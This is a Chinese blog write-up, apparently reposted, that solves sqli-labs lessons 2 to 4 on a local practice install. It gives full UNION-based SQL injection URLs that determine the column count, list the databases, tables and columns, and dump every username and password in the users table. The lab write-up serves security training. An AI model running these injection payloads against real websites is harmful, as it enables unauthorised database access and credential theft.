sqli-labs Less 2-4

时间：2020-02-03 18:50:23 阅读：55 评论：0 收藏：0 [点我收藏+]

Less 2：?id=1 没有进行包裹　　

　　初始语句为：http://127.0.0.1/sqli-labs-master/Less-2/?id=1

技术分享图片

1.输入?id=3-1页面信息发生变化，说明此处是数值型注入

技术分享图片

2.order by 3 页面显示正常，order by 4页面显示不正常，所以该表有3列数据

技术分享图片

接着可以使用联合查询进行注入，过程如下，不再赘述：　　

http://127.0.0.1/sqli-labs-master/Less-2/?id=1 union select 1,2,group_concat(schema_name)from information_schema.schemata--+（查看所有的数据库）

技术分享图片

　　http://127.0.0.1/sqli-labs-master/Less-2/?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=‘security‘ --+（查看数据库中所有的表）

技术分享图片

　　http://127.0.0.1/sqli-labs-master/Less-2/?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name=‘users‘ --+（查看这个表中所有的列的信息）

技术分享图片

　　http://127.0.0.1/sqli-labs-master/Less-2/?id=-1 union select 1,2,group_concat(concat(‘----‘,username,password)) from security.users--+（爆出所有的用户名和密码）

技术分享图片

Less 3：使用(‘1’)进行包裹

　　初始语句为：http://127.0.0.1/sqli-labs-master/Less-3/?id=1‘）

技术分享图片

　　显示不正常，但换为http://127.0.0.1/sqli-labs-master/Less-3/?id=1‘)--+就正常了，说明此处是字符型注入,而且是以 (‘‘)的方式闭合字符串的。技术分享图片

然后下面的操作为常规操作，判断有几列数据，查库，查表，查列，然后把用户名和密码都爆出来：

　　 http://127.0.0.1/sqli-labs-master/Less-3/?id=1’)order by 3--+

　　http://127.0.0.1/sqli-labs-master/Less-3/?id=-1’)union select 1,2,group_concat(schema_name)from information_schema.schemata --+

　　http://127.0.0.1/sqli-labs-master/Less-3/?id=-1‘)union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=‘security‘ --+

　　http://127.0.0.1/sqli-labs-master/Less-3/?id=-1‘)union select 1,2,group_concat(column_name) from information_schema.columns where table_name=‘users‘ --+

　　http://127.0.0.1/sqli-labs-master/Less-3/?id=-1’) union select 1,2,group_concat(concat(‘----‘,username,password)) from security.users--+

技术分享图片

　　页面显示没有问题。

Less-4：使用(“1”)进行包裹

　　初始语句为：http://127.0.0.1/sqli-labs-master/Less-4/?id=1“）

技术分享图片

　　页面显示不正常，但换为http://127.0.0.1/sqli-labs-master/Less-4/?id=1")--+后显示正常。

然后下面的操作为常规操作，判断有几列数据，查库，查表，查列，然后把用户名和密码都爆出来：

　　http://127.0.0.1/sqli-labs-master/Less-4/?id=1”) order by 3--+

　　http://127.0.0.1/sqli-labs-master/Less-4/?id=-1”) union select 1,2,group_concat(schema_name)from information_schema.schemata --+

　　http://127.0.0.1/sqli-labs-master/Less-4/?id=-1”) union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=‘security‘ --+

　　http://127.0.0.1/sqli-labs-master/Less-4/?id=-1”) union select 1,2,group_concat(column_name) from information_schema.columns where table_name=‘users‘ --+

　　http://127.0.0.1/sqli-labs-master/Less-4/?id=-1") union select 1,2,group_concat(concat(‘----‘,username,password)) from security.users--+

技术分享图片

页面回显正常。

sqli-labs Less 2-4

原文：https://www.cnblogs.com/FHBBS/p/12255236.html

踩

(0)

评论一句话评论（0）

分享档案

更多>

2021年09月23日 (328)
2021年09月24日 (313)
2021年09月17日 (191)
2021年09月15日 (369)
2021年09月16日 (411)
2021年09月13日 (439)
2021年09月11日 (398)
2021年09月12日 (393)
2021年09月10日 (160)
2021年09月08日 (222)